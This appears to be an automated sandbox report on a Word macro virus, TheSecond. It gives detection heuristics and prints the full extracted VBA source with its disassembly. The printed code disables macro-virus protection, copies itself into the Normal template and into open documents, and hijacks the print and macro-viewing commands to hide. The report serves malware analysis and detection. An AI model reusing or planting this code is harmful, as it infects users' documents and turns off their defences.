MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains a legacy WordBasic macro and a VBA macro with an AutoClose subroutine, which is a common technique for malware to execute automatically. The script attempts to export itself to 'TheSecond.tmp' and import it into the Normal template, indicating an attempt to achieve persistence or spread. The ClamAV detection 'Doc.Trojan.TheSecond-3' further confirms its malicious nature. The document body contains 'VIRUS!!!!!!!!!!!!!!!' which is likely a lure.
Heuristics 5
-
ClamAV: Doc.Trojan.TheSecond-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.TheSecond-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
Options.VirusProtection = False -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Sub AutoClose() -
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8022 bytes |
SHA-256: 38cd355fcfb71b45470f223a534cfd8a069beb448ffab1fc504de39ecdc21711 |
|||
|
Detection
ClamAV:
Doc.Trojan.TheSecond-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "TheSecond"
Sub AutoClose()
Copyrights = "The Second, 2000"
ForYou = "Wait for the future Word-Excel release!"
Options.VirusProtection = False
flag = False
counter = NormalTemplate.VBProject.VBComponents.Count
For I = 1 To counter
If NormalTemplate.VBProject.VBComponents.Item(I).Name = "TheSecond" Then flag = True
Next I
x = Application.StartupPath + "TheSecond.tmp"
If Not flag Then
ActiveDocument.VBProject.VBComponents("TheSecond").Export (x)
NormalTemplate.VBProject.VBComponents.Import (x)
End If
flag = False
infected = False
havesave = ActiveDocument.Saved
For I = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents.Item(I).Name = "TheSecond" Then flag = True
Next I
If Not flag Then
NormalTemplate.VBProject.VBComponents("TheSecond").Export (x)
ActiveDocument.VBProject.VBComponents.Import (x)
infected = True
End If
If havesave Then
If infected Then
Dialogs(wdDialogFileSaveAs).Execute
End If
Else
Dialogs(wdDialogFileSaveAs).Show
End If
End Sub
Sub FilePrint()
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "威徼�""
.Replacement.Text = "腕滂�""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
Dialogs(wdDialogFilePrint).Show
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
With Selection.Find
.Text = "腕滂�""
.Replacement.Text = "威徼�""
.Forward = True
.Wrap = wdFindContinue
.Format = False
.MatchCase = False
.MatchWholeWord = False
.MatchWildcards = False
.MatchSoundsLike = False
.MatchAllWordForms = False
End With
Selection.Find.Execute Replace:=wdReplaceAll
End Sub
Sub ToolsMacro()
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub ViewVBCode()
MsgBox ("湾� 玎沭箧屙睇� 爨牮铖钼!")
End Sub
' Processing file: /tmp/qstore_3xo72_sp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 924 bytes
' Macros/VBA/TheSecond - 3787 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' LitStr 0x0010 "The Second, 2000"
' St Copyrights
' Line #2:
' LitStr 0x0027 "Wait for the future Word-Excel release!"
' St ForYou
' Line #3:
' LitVarSpecial (False)
' Ld Options
' MemSt VirusProtection
' Line #4:
' LitVarSpecial (False)
' St flag
' Line #5:
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' St counter
' Line #6:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld counter
' For
' Line #7:
' Ld I
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd Name
' LitStr 0x0009 "TheSecond"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St flag
' EndIf
' Line #8:
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #9:
' Ld Application
' MemLd StartupPath
' LitStr 0x000D "TheSecond.tmp"
' Add
' St x
' Line #10:
' Ld flag
' Not
' IfBlock
' Line #11:
' Ld x
' Paren
' LitStr 0x0009 "TheSecond"
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #12:
' Ld x
' Paren
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #13:
' EndIfBlock
' Line #14:
' LitVarSpecial (False)
' St flag
' Line #15:
' LitVarSpecial (False)
' St infected
' Line #16:
' Ld ActiveDocument
' MemLd Saved
' St havesave
' Line #17:
' StartForVariable
' Ld I
' EndForVariable
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' MemLd Count
' For
' Line #18:
' Ld I
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' MemLd Name
' LitStr 0x0009 "TheSecond"
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St flag
' EndIf
' Line #19:
' StartForVariable
' Ld I
' EndForVariable
' NextVar
' Line #20:
' Ld flag
' Not
' IfBlock
' Line #21:
' Ld x
' Paren
' LitStr 0x0009 "TheSecond"
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #22:
' Ld x
' Paren
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemCall Import 0x0001
' Line #23:
' LitVarSpecial (True)
' St infected
' Line #24:
' EndIfBlock
' Line #25:
' Ld havesave
' IfBlock
' Line #26:
' Ld infected
' IfBlock
' Line #27:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Execute 0x0000
' Line #28:
' EndIfBlock
' Line #29:
' ElseBlock
' Line #30:
' Ld wdDialogFileSaveAs
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #31:
' EndIfBlock
' Line #32:
' EndSub
' Line #33:
' FuncDefn (Sub FilePrint())
' Line #34:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #35:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #36:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #37:
' LitStr 0x0006 "威徼�""
' MemStWith Text
' Line #38:
' LitStr 0x0006 "腕滂�""
' MemLdWith Replacement
' MemSt Text
' Line #39:
' LitVarSpecial (True)
' MemStWith Forward
' Line #40:
' Ld wdFindContinue
' MemStWith Wrap
' Line #41:
' LitVarSpecial (False)
' MemStWith Format
' Line #42:
' LitVarSpecial (False)
' MemStWith MatchCase
' Line #43:
' LitVarSpecial (False)
' MemStWith MatchWholeWord
' Line #44:
' LitVarSpecial (False)
' MemStWith MatchWildcards
' Line #45:
' LitVarSpecial (False)
' MemStWith MatchSoundsLike
' Line #46:
' LitVarSpecial (False)
' MemStWith MatchAllWordForms
' Line #47:
' EndWith
' Line #48:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #49:
' Ld wdDialogFilePrint
' ArgsLd Dialogs 0x0001
' ArgsMemCall Show 0x0000
' Line #50:
' Ld Selection
' MemLd Find
' ArgsMemCall ClearFormatting 0x0000
' Line #51:
' Ld Selection
' MemLd Find
' MemLd Replacement
' ArgsMemCall ClearFormatting 0x0000
' Line #52:
' StartWithExpr
' Ld Selection
' MemLd Find
' With
' Line #53:
' LitStr 0x0006 "腕滂�""
' MemStWith Text
' Line #54:
' LitStr 0x0006 "威徼�""
' MemLdWith Replacement
' MemSt Text
' Line #55:
' LitVarSpecial (True)
' MemStWith Forward
' Line #56:
' Ld wdFindContinue
' MemStWith Wrap
' Line #57:
' LitVarSpecial (False)
' MemStWith Format
' Line #58:
' LitVarSpecial (False)
' MemStWith MatchCase
' Line #59:
' LitVarSpecial (False)
' MemStWith MatchWholeWord
' Line #60:
' LitVarSpecial (False)
' MemStWith MatchWildcards
' Line #61:
' LitVarSpecial (False)
' MemStWith MatchSoundsLike
' Line #62:
' LitVarSpecial (False)
' MemStWith MatchAllWordForms
' Line #63:
' EndWith
' Line #64:
' Ld wdReplaceAll
' ParamNamed Replace
' Ld Selection
' MemLd Find
' ArgsMemCall Execute 0x0001
' Line #65:
' EndSub
' Line #66:
' FuncDefn (Sub ToolsMacro())
' Line #67:
' Ld wdDialogToolsMacro
' ArgsLd Dialogs 0x0001
' ArgsMemCall Display 0x0000
' Line #68:
' EndSub
' Line #69:
' FuncDefn (Sub ViewVBCode())
' Line #70:
' LitStr 0x0019 "湾� 玎沭箧屙睇� 爨牮铖钼!"
' Paren
' ArgsCall MsgBox 0x0001
' Line #71:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.